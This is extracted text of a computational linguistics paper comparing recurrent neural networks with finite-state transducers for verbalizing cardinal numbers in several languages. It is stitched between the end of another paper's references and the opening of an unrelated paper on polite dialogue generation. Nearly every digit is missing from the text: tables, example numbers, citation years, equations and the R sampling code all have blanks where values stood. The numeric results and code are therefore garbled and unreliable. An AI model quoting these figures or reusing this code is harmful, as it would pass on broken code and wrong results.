structural analysis. group for logic & formal semantics research report # - , suny stony brook. strecher, v. j., & i. m. rosenstock ( ). the health belief model. in health behavior and health education: theory, research, and practice, eds. k. glanz, f. m. lewis, and b. k. rimer. san francisco: jossey-bass. trotter, r. t., r. b. rothenberg, & s. coyle ( ). drug abuse and hiv prevention research: expanding paradigms and network contributions to risk reduction. connections , - . valente, t. ( ). network models of the diffusion of innovations. cresskill, n. j.: hampton press. valente, t. ( ). social networks and health: models, methods, and applications. new york: oxford university press. valente, t., & r. l. davis ( ). accelerating the diffusion of innovations using opinion leaders. annals of the aapss , - . watts, d. j., & s. h. strogatz ( ). collective dynamics of 'small-world' networks. nature , . minimally supervised number normalization kyle gorman and richard sproat google, inc. th ave., new york, ny, usa abstract we propose two models for verbalizing num- bers, a key component in speech recognition and synthesis systems. the first model uses an end-to-end recurrent neural network. the sec- ond model, drawing inspiration from the lin- guistics literature, uses finite-state transducers constructed with a minimal amount of training data. while both models achieve near-perfect performance, the latter model can be trained using several orders of magnitude less data than the former, making it particularly useful for low-resource languages. introduction many speech and language applications require text tokens to be converted from one form to another. for example, in text-to-speech synthesis, one must con- vert digit sequences ( ) into number names (thirty- two), and appropriately verbalize date and time ex- pressions ( : → twelve forty-seven) and abbre- viations (kg → kilograms) while handling allomor- phy and morphological concord (e.g., sproat, ). quite a bit of recent work on sms (e.g., beaufort et al., ) and text from social media sites (e.g., yang and eisenstein, ) has focused on detect- ing and expanding novel abbreviations (e.g., cn u plz hlp). collectively, such conversions all fall under the rubric of text normalization (sproat et al., ), but this term means radically different things in differ- ent applications. for instance, it is not necessary to detect and verbalize dates and times when preparing social media text for downstream information extrac- tion, but this is essential for speech applications. while expanding novel abbreviations is also im- portant for speech (roark and sproat, ), num- bers, times, dates, measure phrases and the like are far more common in a wide variety of text genres. following taylor ( ), we refer to cate- gories such as cardinal numbers, times, and dates— each of which is semantically well-circumscribed— as semiotic classes. some previous work on text nor- malization proposes minimally-supervised machine learning techniques for normalizing specific semi- otic classes, such as abbreviations (e.g., chang et al., ; pennell and liu, ; roark and sproat, ). this paper continues this tradition by con- tributing minimally-supervised models for normal- ization of cardinal number expressions (e.g., ninety- seven). previous work on this semiotic class include formal linguistic studies by corstius ( ) and hur- ford ( ) and computational models proposed by sproat ( ; ) and kanis et al. ( ). of all semiotic classes, numbers are by far the most im- portant for speech, as cardinal (and ordinal) num- bers are not only semiotic classes in their own right, but knowing how to verbalize numbers is important for most of the other classes: one cannot verbalize times, dates, measures, or currency expressions with- out knowing how to verbalize that language’s num- bers as well. one computational approach to number name ver- balization (sproat, ; kanis et al., ) employs a cascade of two finite-state transducers (fsts). the first fst factors the integer, expressed as a digit se- quence, into sums of products of powers of ten (i.e., in the case of a base-ten number system). this is composed with a second fst that defines how the transactions of the association for computational linguistics, vol. , pp. – , . action editor: jason eisner. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. numeric factors are verbalized, and may also handle allomorphy or morphological concord in languages that require it. number names can be relatively easy (as in english) or complex (as in russian; sproat, ) and thus these fsts may be relatively easy or quite difficult to develop. while the google text-to- speech (tts) (see ebden and sproat, ) and au- tomatic speech recognition (asr) systems depend on hand-built number name grammars for about languages, developing these grammars for new lan- guages requires extensive research and labor. for some languages, a professional linguist can develop a new grammar in as little as a day, but other lan- guages may require days or weeks of effort. we have also found that it is very common for these hand- written grammars to contain difficult-to-detect er- rors; indeed, the computational models used in this study revealed several long-standing bugs in hand- written number grammars. the amount of time, effort, and expertise required to produce error-free number grammars leads us to consider machine learning solutions. yet it is im- portant to note that number verbalization poses a dauntingly high standard of accuracy compared to nearly all other speech and language tasks. while one might forgive a tts system that reads the am- biguous abbreviation plz as plaza rather than the in- tended please, it would be inexcusable for the same system to ever read as four hundred seventy two, even if it rendered the vast majority of numbers cor- rectly. to set the stage for this work, we first (§ – ) briefly describe several experiments with a power- ful and popular machine learning technique, namely recurrent neural networks (rnns). when provided with a large corpus of parallel data, these systems are highly accurate, but may still produce occasional er- rors, rendering it unusable for applications like tts. in order to give the reader some background on the relevant linguistic issues, we then review some cross- linguistic properties of cardinal number expressions and propose a finite-state approach to number nor- malization informed by these linguistic properties (§ ). the core of the approach is an algorithm for in- ducing language-specific number grammar rules. we evaluate this technique on data from four languages. figure : the neural net architecture for the preliminary russian cardinal number experiments. purple lstm lay- ers perform forwards transitions and green lstm layers perform backwards transitions. the output is produced by a ctc layer with a softmax activation function. input to- kens are characters and output tokens are words. preliminary experiment with recurrent neural networks as part of a separate strand of research, we have been experimenting with various recurrent neural network (rnn) architectures for problems in text normaliza- tion. in one set of experiments, we trained rnns to learn a mapping from digit sequences marked with morphosyntactic (case and gender) information, and their expression as russian cardinal number names. the motivation for choosing russian is that the num- ber name system of this language, like that of many slavic languages, is quite complicated, and therefore serves as a good test of the abilities of any text nor- malization system. the architecture used was similar to a network employed by rao et al. ( ) for grapheme- to-phoneme conversion, a superficially similar sequence-to-sequence mapping problem. we used a recurrent network with an input layer, four hidden feed-forward lstm layers (hochreiter and schmid- huber, ), and a connectionist temporal classi- fication (ctc) output layer with a softmax activa- tion function (graves et al., ). two of the hidden layers modeled forward sequences and the other two backward sequences. there were in- put nodes—corresponding to characters—and output nodes—corresponding to predicted number name words. each of the hidden layers had nodes. the full architecture is depicted in figure . the system was trained on m unique digit se- experiments with a non-ctc softmax output layer yielded consistently poor results, and we do not report them here. quences ranging from one to one million; these were collected by applying an existing tts text normal- ization system to several terabytes of web text. each training example consisted of a digit sequence, gen- der and case features, and the russian cardinal num- ber verbalization of that number. thus, for example, the system has to learn to produce the feminine in- strumental form of . examples of these mappings are shown in table , and the various inflected forms of a single cardinal number are given in table . in preliminary experiments, it was discovered that short digit sequences were poorly modeled due to under- sampling, so an additional , short sequence samples (of three or fewer digits) were added to com- pensate. . m examples ( %) were held out as a development set. the system was trained for one day, after which it had a % label error rate (ler) on the development data set. when decoding , tokens of held-out test data with this model, we achieved very high ac- curacy (ler < . ). the few remaining errors, however, are a serious obstacle to using this system for tts. the model appears to make no mistakes ap- plying inflectional suffixes to unseen data. plausibly, this task was made easier by our positioning of the morphological feature string at the end of the input, making it local to the output inflectional suffix (at least for the last word in the number expression). but it does make errors with respect to the numeric value of the expression. for example, for plu.ins. (девятью тысячами восьмьюстами одними), the system produced девятью тысячами семьюстами одними ( plu.ins.): the morphology is cor- rect, but the numeric value is wrong. this pattern of errors was exactly the opposite of what we want for speech applications. one might forgive a tts system that reads with the cor- rect numeric value but in the wrong case form: a lis- tener would likely notice the error but would usually not be misled about the message being conveyed. in contrast, reading it as nine thousand seven hundred and one is completely unacceptable, as this would actively mislead the listener. it is worth pointing out that the training set used here— m examples—was quite large, and we were the exact number of errors and their particular details var- ied from run to run. only able to obtain such a large amount of labeled data because we already had a high-quality hand- built grammar designed to do exactly this transduc- tion. it is simply unreasonable to expect that one could obtain this amount of parallel data for a new language (e.g., from naturally-occurring examples, or from speech transcriptions). this problem is es- pecially acute for low-resource languages (i.e., most of the world’s languages), where data is by defini- tion scarce, but where it is also hard to find high- quality linguistic resources or expertise, and where a machine learning approach is thus most needed. in conclusion, the system does not perform as well as we demand, nor is it in any case a practical solu- tion due to the large amount of training data needed. the rnn appears to have done an impressive job of learning the complex inflectional morphology of russian, but it occasionally chooses the wrong num- ber names altogether. number normalization with rnns for the purpose of more directly comparing the per- formance of rnns with the methods we report on below, we chose to ignore the issue of allomorphy and morphological concord, which appears to be “easy” for generic sequence models like rnns, and focus instead on verbalizing number expressions in whatever morphological category represents the lan- guage’s citation form. . data and general approach for our experiments we used three parallel data sets where the target number name was in citation form (in russian, nominative case): • a large set consisting of , examples ex- tracted from several terabytes of web text using an existing tts text normalization system • a medium set of , randomly-generated ex- amples (for details, see appendix a) • a minimal set of examples, consisting of the counting numbers up to , and carefully-chosen examples engineered to cover a wide variety of phenomena a separate set of , randomly-generated exam- ples were held out for evaluation. neu.gen. → пяти five mas.acc. → двадцать четыре twenty-four plu.ins. → девяноста девятью ninety-nine fem.nom. → одиннадцать eleven fem.gen. → восьмидесяти одной eighty-one fem.ins. → шестьюдесятью sixty neu.ins. → девяноста одним ninety-one mas.gen. → трёх three table : example input and output data (and glosses) for the russian rnn experiments. шестьдесят nominative (nom.) шестидесяти genitive (gen.) шестидесяти dative (dat.) шестьдесят accusative (acc.) шестьюдесятью instrumental (ins.) шестидесяти prepositional (pre.) table : inflectional forms of the cardinal number number “ ” in russian. the minimal set was intended to be representative of the sort of data one might obtain from a native- speaker when asked to provide all the essential infor- mation about number names in their language. in these experiments we used two different rnn models. the first was the same lstm architecture as above (henceforth referred to as “lstm”), except that the numbers of input and output nodes were and , respectively, due to the smaller input and out- put vocabularies. the second was a tensorflow-based rnn with an attention mechanism (mnih et al., ), using an overall architecture similar to that used in a system for end-to-end speech recognition (chan et al., ). specifically, we used a -layer pyramidal bidirec- tional lstm reader that reads input characters, a layer of attentional units, and a -layer decoder that produces word sequences. the reader is referred to chan et al., for further details. henceforth we refer to this model as “attention”. all models were trained for hours, at which point they were determined to have converged. note that the native speaker in question merely needs to be able to answer questions of the form “how do you say ‘ ’ in your language?”; they do not need to be linguistically trained. in contrast, hand-built grammars require at least some linguistic sophistication on the part of the grammarian. . results and discussion results for these experiments on a test corpus of , random examples are given in table . the rnn with attention clearly outperformed the lstm in that it performed perfectly with both the medium and large training sets, whereas the lstm made a small percentage of errors. note that since the numbers were in citation form, there was little room for the lstm to make inflectional errors, and the er- rors it made were all of the “silly” variety, in which the output simply denotes the wrong number. but neither system was capable of learning valid trans- ductions given just training examples. we draw two conclusions from these results. first, even a powerful machine learning model known to be applicable to a wide variety of problems may not be appropriate for all superficially-similar prob- lems. second, it remains to be seen whether any rnn could be designed to learn effectively from an amount of data as small as our smallest training set. learning from minimal data sets is of great practical concern, and we will proceed to provide a plausible solution to this problem below. we note again that very low error rates do not ensure that a system is the failure of the rnns to generalize from the minimal training set suggests they are evidently not expressive enough for the sort of “clever” inference that is needed to generalize from so little data. it is plausible that an alternative rnn archi- tecture could learn with such a small amount of data, though we leave it to future research to discover just what such an ar- chitecture might be. in an attempt to provide the rnns with additional support, we also performed an evaluation with the minimal training set in which inputs were encoded so that each decimal position above was represented with a letter (a for , b for , and so forth). thus was represented as c a . in principle, this ought to have prevented errors which fail to take positional information into account. unfortunately, this made no difference whatsoever. training size lstm acc. attention acc. overlap , . . % , . . % < . < . < % table : accuracies on a test corpus of , random russian citation-form number-name examples for the two rnn architectures. “overlap” indicates the percentage of the test examples that are also found in the training data. usable, since not all errors are equally forgivable. number normalization with finite-state transducers the problem of number normalization naturally de- composes into two subproblems: factorization and verbalization of the numeric factors. we first con- sider the latter problem, the simpler of the two. let λ be the set of number names in the target lan- guage, and let ν be the set of numerals, the integers denoted by a number name. then let l : ν∗ → λ∗ be a transducer which replaces a sequence of nu- merals with a sequence of number names. for in- stance, for english, l will map to ninety seven. in languages where there are multiple allomorphs or case forms for a numeral, l will be non-functional (i.e., one-to-many); we return to this issue shortly. in nearly all cases, however, there are no more than a few dozen numerals in ν, and no more than a few names in λ for the equivalent numeral in ν. there- fore, we assume it is possible to construct l with min- imal effort and minimal knowledge of the language. indeed, all the information needed to construct l for the experiments conducted in this paper can be found in english-language wikipedia articles. the remaining subproblem, factorization, is re- sponsible for converting digit sequences to numeral factors. in english, for example, is factored as . factorization is also language-specific. in standard french, for example, there is no sim- plex number name for ‘ ’; instead this is realized as quatre-vingt-dix “four twenty ten”, and thus (quatre-vingt-dix-sept mille) is factored as . it is not a priori obvious how one might go about learning language-specific factorizations. for at worst, a small number of languages, such as several indic languages of north india, effectively use unique numerals for all counting numbers up to . inspiration, we turn to a lesser-known body of lin- guistics research focusing on number grammars. hurford ( ) surveys cross-linguistic properties of number naming and proposes a syntactic repre- sentation which directly relates verbalized number names to the corresponding integers. hurford inter- prets complex number constructions as arithmetic expressions in which operators (and the parenthe- ses indicating associativity) have been elided. by far the two most common arithmetic operations are multiplication and addition. in french, for exam- ple, the expression dix-sept, literally ‘ten seven’, de- notes , the sum of its terms, and quatre-vingt(s), literally ‘four twenty’, refers to , the product of its terms. these may be combined, in quatre-vingt- dix-sept. to visualize arithmetic operations and as- sociativities, we henceforth write factorizations us- ing s-expressions—pre-order serializations of k-ary trees—with numeral terminals and arithmetic oper- ator non-terminals. for example, quatre-vingt-dix- sept is written (+ (* ) ). within any language there are cues to this elided arithmetic structure. in some languages, some or all addends are separated by a word translated as and. in other languages it is possible to determine whether terms are to be multiplied or summed depending on their relative magnitudes. in french (as in english), for instance, an expression xy usually is interpreted as a product if x < y, as in quatre-vingt(s) ‘ ’, but as a sum if x > y, as in vingt-quatre ‘ ’. thus the problem of number denormalization—that is, recov- ering the integer denoted by a verbalized number— can be thought of as a special case of grammar induc- tion from pairs of natural language expressions and some languages make use of half-counting, or multiplica- tion by one half (e.g., welsh hanner cant, ‘ ’, literally ‘half hundred’), or back-counting, i.e., subtraction (e.g., latin unde- vīgintī, ‘ ’, literally ‘one from twenty’; menninger, , f.). but these do not reduce the generality of the approach here. their denotations (e.g., kwiatkowski et al., ). . fst model the complete model consists of four components: . a language-independent covering grammar f, transducing from integers expressed as digit se- quences to the set of possible factorizations for that integer . a language-specific numeral map m, transduc- ing from digit sequences to numerals . a language-specific verbalization grammar g, accepting only those factorizations which are licit in the target language . a language-specific lexical map l, transducing from sequences of numerals (e.g., ) to num- ber names (already defined) as the final component, the lexical map l, has al- ready been described, we proceed to describe the re- maining three components of the system. . . finite-state transducer algorithms while we assume the reader has some familiarity with fsts, we first provide a brief review of a few key algorithms we employ below. our fst model is constructed using composition, denoted by the ◦ operator. when both arguments to composition are transducers, composition is equiva- lent to chaining the two relations described. for ex- ample, if a transduces string x to string y, and b trans- duces y to z, then a ◦ b transduces from string x to string z. when the left-hand side of composition is a transducer and the right-hand side is an accep- tor, then their composition produces a transducer in which the range of the left-hand side relation is inter- sected with the set of strings accepted by the right- hand side argument. thus if a transduces string x to strings {y, z}, and b accepts y then a ◦ b transduces from x to y. we make use of two other fundamental operations, namely inversion and projection. every transducer a has an inverse denoted by a− , which is the trans- ducer such that a− (y) → x if and only if a(x) → y. any transducer a also has input and output projec- tions denoted by πi(a) and πo(a), respectively. if the transducer a has the domain α∗ and the range β∗, then πi(a) is the acceptor over α∗ which accepts x if and only if a(x) → y for some y ∈ β∗; output pro- jection is defined similarly. the inverse, input pro- jection, and output projection of an fst (or a push- down transducer) are computed by swapping and/or copying the input or output labels of each arc in the machine. see mohri et al., for more details on these and other finite-state transducer algorithms. . . covering grammar let a be an fst which, when repeatedly applied to an arithmetic s-expression string, produces the s- expression’s value. for example, one application of a to (+ (* ) ) produces (+ ), and a second application produces . let μ be the set of s-expression markup symbols {‘(’, ‘)’, ‘+’, ‘*’} and Δ be the set { , , , . . . , }. then, f : Δ∗ → (μ ∪ Δ)∗ = a− ◦ a− ◦ a− . . . ( ) is an fst which transduces an integer expressed as a digit string to all its candidate factorizations expressed as s-expression strings. let c(d) = πo (d ◦ f), which maps from a digit sequence d to the set of all possible factorizations—in any language—of that digit sequence, encoded as s- expressions. for example, c( ) contains strings such as: (+ ) (+ ) (+ (* ) ) … . . grammar inference let m : (μ ∪ Δ)∗ → ν∗ be a transducer which deletes all markup symbols in μ and replaces se- quences of integers expressed as digit sequences with the appropriate numerals in ν. let d(l) = πi (m ◦ l ◦ l), which maps from a verbalization l to the set of all s-expressions which contain l as ter- minals. for example, d( ) contains: in practice, our s-expressions never have a depth exceeding five, so we assume f = a− ◦ a− ◦ a− ◦ a− ◦ a− . s → ( | | * | +) ∗ → ( | | +) + → table : a fragment of an english number grammar which accepts factorizations of the numbers { , , , , , and }. s represents the start symbol, and ‘|’ denotes disjunction. note that this fragment is regular rather than context-free, though this is rarely the case for complete grammars. (+ ) (+ (* )) (+ (* ) ) … then, given (d, l) where d ∈ Δ∗ is an integer ex- pressed as a digit sequence, and l ∈ λ∗ is d’s verbal- ization, their intersection e(d, l) = c(d) ◦ d(l) ( ) will contain the factorization(s) of d that verbalizes as l. in most cases, e will contain exactly one path for a given (d, l) pair. for instance, if d is and l is ninety seven thousand, e(d, l) is (* (+ ) ). we can use e to induce a context-free grammar (cfg) which accepts only those number verbaliza- tions present in the target language. the simplest pos- sible such cfg uses ‘*’ and ‘+’ as non-terminal la- bels, and the elements in the domain of l (e.g., ) as terminals. the grammar will then consist of binary productions extracted from the s-expression deriva- tions produced by e. table provides a fragment of such a grammar. with this approach, we face the familiar issues of ambiguity and sparsity. concerning the former, the output of e is not unique for all outputs. we address this either by applying normal form constraints on the set of permissible productions, or ignoring am- biguous examples during induction. one case of am- biguity involves expressions involving addition with or multiplication by , both identity operations that leave the identity element (i.e., or ) free to asso- ciate either to the left or to the right. from our per- spective, this ambiguity is spurious, so we stipulate that identity elements may only be siblings to (i.e., on the right-hand side of a production with) another digit → ( | | | … ) teen → ( | | | … ) decade → ( | | |… ) century → ( | | | … ) power_of_ten → ( | | …) table : optional preterminal rules. terminal. thus an expression like one thousand one hundred can only be parsed as (+ (* ) (* )). but not all ambiguities can be handled by normal form constraints. some expressions are am- biguous due to the presence of “palindromes” in the verbalization string. for instance, two hundred two can either be parsed as (+ (* )) or (+ (* )). the latter derivation is “correct” insofar as it follows the syntactic patterns of other english number expressions, but there is no way to deter- mine this except with reference to the very language- specific patterns we are attempting to learn. there- fore we ignore such expressions during grammar in- duction, forcing the relevant rules to be induced from unambiguous expressions. similarly, multiplication and addition are associative so expressions like three hundred thousand can be binarized either as (* (* ) ) or (* (* )), though both derivations are equally “correct”. once again we ig- nore such ambiguous expressions, instead extracting the relevant rules from unambiguous expressions. since we only admit two non-terminal labels, the vast majority of our rules contain numeral terminals on their right-hand sides, and as a result, the num- ber of rules tends to be roughly proportional to the size of the terminal vocabulary. thus it is common that we have observed, for instance, thirteen thou- sand and fourteen million but not fourteen thousand or thirteen million, and as a result, the cfg may be deficient simply due to sparsity in the training data, particularly in languages with large terminal vocab- ularies. to enhance our ability to generalize from a small number of examples, we optionally insert preterminal labels during grammar induction to form classes of terminals assumed to pattern together in all productions. for instance, by introducing ‘teen’ and ‘power_of_ten’ preterminals, all four of the previous expressions are generated by the same top-level pro- duction. the full set of preterminal labels we use here are shown in table . in practice, obtaining productions using e is inef- ficient: it is roughly equivalent to a naïve algorithm which generates all possible derivations for the nu- merals given, then filters out all of those which do not evaluate to the expected total, violate the afore- mentioned normal form constraints, or are otherwise ambiguous. this fails to take advantage of top-down constraints derived from the particular structure of the problem. for example, the naïve algorithm en- tertains many candidate parses for quatre-vingt-dix- sept ‘ ’ where the root is ‘*’ and the first child is ‘ ’, despite the fact that no such hypothesis is viable as is not a divisor of . we inject arithmetic constraints into the gram- mar induction procedure, as follows. the inputs to the modified algorithm are tuples of the form (t, ν , . . . , νn) where t is the numeric value of the expression and ν , . . . , νn are the n + numerals in the verbalization. consider a hypothesized numeric value of the leftmost child of the root, t ...i, which dominates ν , . . . , νi where i < n. for this to be vi- able, it must be the case that t ...i ≤ t. and, if we further hypothesize that the root node is ‘+’, then the remaining children must evaluate to t−t ...i. simi- larly, if we hypothesize that the root node is ‘*’, then the remaining children must evaluate to t/t ...i, and this quantity must be integral. this approach can be implemented with a back- tracking recursive descent parser enforcing the afore- mentioned normal form constraints and propagat- ing the top-down arithmetic constraints. in practice, however, we implement the search using a straight- forward dynamic programming algorithm. the algo- rithm proceeds by recursively generating all possi- ble leftmost children of the tree and then using these top-down constraints to prune branches of the search space which have no viable completion (though our implementation does not fully propagate these con- straints). while the number of left subtrees is expo- nential in the length of the verbalization, our imple- mentation remains feasible since real-world exam- ples tend to have verbalizations consisting of rela- tively few terminals. pseudocode for our implemen- tation is provided in appendix b. . . grammar compilation once productions have been collected, they are used to specify a recursive transition network (woods, ) which is then compiled into a push- down acceptor (allauzen and riley, ) over ν∗, henceforth g. an example is shown in figure . . . final model and remaining issues then, the verbalization for d is given by v(d) = πo (d ◦ f ◦ m ◦ g ◦ l) . ( ) as noted above, the lexicon transducer l is non- functional when there are multiple number names for a single numeral, as may arise in number systems with allomorphy or morphological concord. when this is the case, we compose the lattice produced byv with a language model (lm) of verbalized numbers (over λ∗) and then decode using the shortest path al- gorithm. note that whereas the construction of g re- quires parallel data, the lm requires only “spoken” data. while it is not common in most languages to write out complex cardinal numbers in their verbal- ized form, it is nonetheless possible to find a large sample of such expressions at web scale (sproat, ); such expressions can be identified by match- ing against the unweighted πo (f ◦ m ◦ g ◦ l). . materials and methods the fst-based verbalizer v was constructed and evaluated using four languages: english, georgian, khmer, and russian (the latter targeting citation forms only). the medium and minimal sets are used for all four languages; in russian, we also reuse the large data set (see § . ). in all cases the test sets consisted of , randomly generated examples, the same examples as in previous experiments. the size of v varied by language, with the small- est, english, consisting of roughly , states and arcs, and the largest, russian, measuring roughly , states and arcs and comprising approximately a megabyte of uncompressed binary data. no lm was required for either english or khmer as both have a functional l. however, the georgian and russian l are both ambiguous, so the best path through the output lattice was selected according to a trigram language model with witten-bell smooth- ing. the language models were constructed using the medium training set. (* (+ (+ )* )+)+ figure : a pushdown acceptor that accepts all the language of the grammar fragment in table . arc labels that contain parentheses indicate “push” and “pop” stack operations, respectively, and must balance along a path. locale training size num. acc. morph. acc. overlap eng_us , . . % . . < % kat_ge , . . % . . < % khm_kh , . . % . . < % rus_ru , . . % , . . % . . < % table : evaluation of the fst verbalizer on english (eng_us), georgian (kat_ge), khmer (kmh_kh), and russian (rus_ru); errors are separated into those which affect the numeric denotation (“num. acc.”) and those which merely use incorrect morphological forms (“morph. acc.”). . results and discussion the results were excellent for all four languages. there were no errors at all in english, georgian, and khmer with either data set. while there were a few errors in russian, crucially all were agree- ment errors rather than errors in the factorization itself, exactly the opposite pattern of error to the ones we observed with the lstm model. for example, , , was rendered as семьдесят миллион четыреста семьдесят семь тысяч сто семьдесят; the second word should be миллионов, the genitive plural form. more surprisingly, verbalizers trained on the examples of the minimal data set per- formed just as well as ones trained with two orders of magnitude more labeled data. discussion we presented two approaches to number normaliza- tion. the first used a general rnn architecture that has been used for other sequence mapping problems, and the second an fst-based system that uses a fair amount of domain knowledge. the rnn approach can achieve very high accuracy, but with two caveats: it requires a large amount of training data, and the er- rors it makes may result in the wrong number. the fst-based solution on the other hand can learn from a tiny dataset, and never makes that particularly per- nicious type of error. the small size of training data needed and the high accuracy make this a particu- larly attractive approach for low-resource scenarios. in fact, we suspect that the fst model could be made to learn from a smaller number of examples than the that make up the “minimal” set. finding the min- imum number of examples necessary to cover the entire number grammar appears to be a case of the set cover problem—-which is np-complete (karp, )—but it is plausible that a greedy algorithm could identify an even smaller training set. the grammar induction method used for the fst verbalizer is near to the simplest imaginable such procedure: it treats rules as well-formed if and only if they have at least one unambiguous occurrence in the training data. more sophisticated induction methods could be used to improve both generalization and ro- bustness to errors in the training data. generalization might be improved by methods that “hallucinate” un- observed productions (mohri and roark, ), and robustness could be improved using manual or au- tomated tree annotation (e.g., klein and manning, ; petrov and klein, ). we leave this for fu- ture work. above, we focused solely on cardinal numbers, and specifically their citation forms. however, in all four languages studied here, ordinal numbers share the same factorization and differ only superficially from cardinals. in this case, the ordinal number ver- balizer can be constructed by applying a trivial trans- duction to the cardinal number verbalizer. however, it is an open question whether this is a universal or whether there may be some languages in which the discrepancy is much greater, so that separate meth- ods are necessary to construct the ordinal verbalizer. the fst verbalizer does not provide any mech- anism for verbalization of numbers in morphologi- cal contexts other than citation form. one possibility would be to use a discriminative model to select the most appropriate morphological variant of a number in context. we also leave this for future work. one desirable property of the fst-based system is that fsts (and pdts) are trivially invertible: if one builds a transducer that maps from digit sequences to number names, one can invert it, resulting in a trans- ducer that maps number names to digit sequences. (invertibility is not a property of any rnn solution.) this allows one, with the help of the appropriate target-side language model, to convert a normaliza- tion system into a denormalization system, that maps from spoken to written form rather than from written to spoken. during asr decoding, for example, it is often preferable to use spoken representations (e.g., twenty-three) rather than the written forms (e.g., ), and then perform denormalization on the resulting transcripts so they can be displayed to users in a more-readable form (shugrina, ; vasserman et al., ). in ongoing work we are evaluating fst verbalizers for use in asr denormalization. conclusions we have described two approaches to number nor- malization, a key component of speech recognition and synthesis systems. the first used a recurrent neu- ral network and large amounts of training data, but very little knowledge about the problem space. the second used finite-state transducers and a learning method totally specialized for this domain but which requires very little training data. while the former approach is certainly more appealing given current trends in nlp, only the latter is feasible for low- resource languages which most need an automated approach to text normalization. to be sure, we have not demonstrated than rnns—or similar models—are inapplicable to this problem, nor does it seem possible to do so. how- ever, number normalization is arguably a sequence- to-sequence transduction problem, and rnns have been shown to be viable end-to-end solutions for sim- ilar problems, including grapheme-to-phoneme con- version (rao et al., ) and machine translation (sutskever et al., ), so one might reasonably have expected them to have performed better without making the “silly” errors that we observed. much of the recent rhetoric about deep learning suggests that neural networks obviate the need for incorporating detailed knowledge of the problem to be solved; in- stead, one merely needs to feed pairs consisting of inputs and the required outputs, and the system will self-organize to learn the desired mapping (graves and jaitly, ). while that is certainly a desirable ideal, for this problem one can achieve a much more compact and data-efficient solution if one is willing to exploit knowledge of the domain. acknowledgements thanks to cyril allauzen, jason eisner, michael ri- ley, brian roark, and ke wu for helpful discus- sion, and to navdeep jaitly and haşim sak for as- sistance with rnn modeling. all finite-state mod- els were constructed using the opengrm libraries (http://opengrm.org). references cyril allauzen and michael riley. . a pushdown transducer extension for the openfst library. in ciaa, pages – . richard beaufort, sophie roekhaut, louise-amélie cougnon, and cédrick fairon. . a hybrid rule/model-based finite-state framework for normaliz- ing sms messages. in acl, pages – . william chan, navdeep jaitly, quoc v. le, and oriol vinyals. . listen, attend and spell: a neural net- work for large vocabulary conversational speech recog- nition. in icassp, pages – . jeffrey t. chang, hinrich schütze, and russ b. altman. . creating an online dictionary of abbreviations from medline. journal of the american medical in- formatics association, ( ): – . h. brandt corstius, editor. . grammars for number names. d. reidel, dordrecht. peter ebden and richard sproat. . the kestrel tts text normalization system. natural language engi- neering, ( ): – . alex graves and navdeep jaitly. . towards end-to- end speech recognition with recurrent neural networks. in icml, pages – . alex graves, santiago fernández, gaustino gomez, and jürgen schmidhuber. . connectionist tempo- ral classification: labeling unsegmented sequence data with recurrent neural networks. in icml, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . james r. hurford. . the linguistic theory of nu- merals. cambridge university press, cambridge. jakub kanis, jan zelinka, and luděk müller. . auto- matic number normalization in inflectional languages. in specom, pages – . richard m. karp. . reducibility among combina- torial problems. in raymond e. miller and james w. thatcher, editors, complexity of computer computa- tions, pages – . plenum, new york. dan klein and christopher d. manning. . accurate unlexicalized parsing. in acl, pages – . tom kwiatkowski, luke zettlemoyer, sharon goldwater, and mark steedman. . lexical generalization in ccg grammar induction for semantic parsing. in emnlp, pages – . karl menninger. . number words and number sym- bols. mit press, cambridge. translation of zahlwort und ziffer, published by vanderhoeck & ruprecht, breslau, . volodymyr mnih, nicolas heess, alex graves, and ko- ray kavukcuoglu. . recurrent models of visual attention. in nips, pages – . mehryar mohri and brian roark. . probabilistic context-free grammar induction based on structural ze- ros. in naacl, pages – . mehryar mohri, fernando pereira, and michael riley. . weighted finite-state transducers in speech recognition. computer speech & language, ( ): – . deana pennell and yang liu. . toward text message normalization: modeling abbreviation generation. in icassp, pages – . slav petrov and dan klein. . improved inference for unlexicalized parsing. in naacl, pages – . kanishka rao, fuchun peng, haşim sak, and françoise beaufays. . grapheme-to-phoneme conversion using long short-term memory recurrent neural net- works. in icassp, pages – . brian roark and richard sproat. . hippocratic ab- breviation expansion. in acl, pages – . maria shugrina. . formatting time-aligned asr transcripts for readability. in naacl, pages – . richard sproat, alan w. black, stanley chen, shankar kumar, mari ostendorf, and christopher richards. . normalization of non-standard words. com- puter speech and language, ( ): – . richard sproat. . multilingual text analysis for text- to-speech synthesis. natural language engineering, ( ): – . richard sproat. . lightly supervised learning of text normalization: russian number names. in ieee work- shop on speech and language technology, pages – . ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in nips, pages – . paul taylor. . text to speech synthesis. cambridge university press, cambridge. lucy vasserman, vlad schogol, and keith hall. . sequence-based class tagging for robust transcription in asr. in interspeech, pages – . william a. woods. . transition network grammars for natural language analysis. communications of the acm, ( ): – . yi yang and jacob eisenstein. . a log-linear model for unsupervised text normalization. in emnlp, pages – . a random sampling procedure random-generated data sets were produced by sampling from a yule-simon distribution with ρ = , then rounding each sample’s k trailing digits, where k is a random variable in the discrete uniform distribution u{ , n} and n is the order of the sampled number. duplicate samples were then removed. the following r function implements this procedure. require(vgam) epsilon <- e- rnumbers <- function(n) { x <- ryules(n, rho= ) num.digits <- floor(log (x + epsilon)) + sig.digits <- ceiling(runif(n, min= , max=num.digits)) unique(signif(x, sig.digits)) } b parse generation algorithm the following algorithm is used to generate parses from parallel (written/spoken) data. it depends upon a procedure getsubtrees(…) generating all possible labeled binary subtrees given a sequence of terminals, which is left as an exercise to the reader. : procedure getoracles(t, v , …, vn) ▷ total t, terminals v , …, vn. : if n = then : if eval(v ) = t then : yield s-expression v : end if : return : end if : for i ∈ . . . n− do ▷ size of left child. : for all l ∈ getsubtrees(v , …, vi) do : tl ← eval(l) : tr ← t − tl ▷ hypothesizes + root. : if tr > then : for all r ∈ getoracles(tr, vi+ , …, vn) do : yield s-expression (+ l r) : end for : end if : tr ← t / tl ▷ hypothesizes * root. : if tr ∈n then ▷ “is a natural number”. : for all r ∈ getoracles(tr, vi+ , …, vn) do : yield s-expression (* l r) : end for : end if : end for : end for : end procedure polite dialogue generation without parallel data tong niu and mohit bansal unc chapel hill {tongn, mbansal}@cs.unc.edu abstract stylistic dialogue response generation, with valuable applications in personality-based conversational agents, is a challenging task because the response needs to be fluent, contextually-relevant, as well as paralinguis- tically accurate. moreover, parallel datasets for 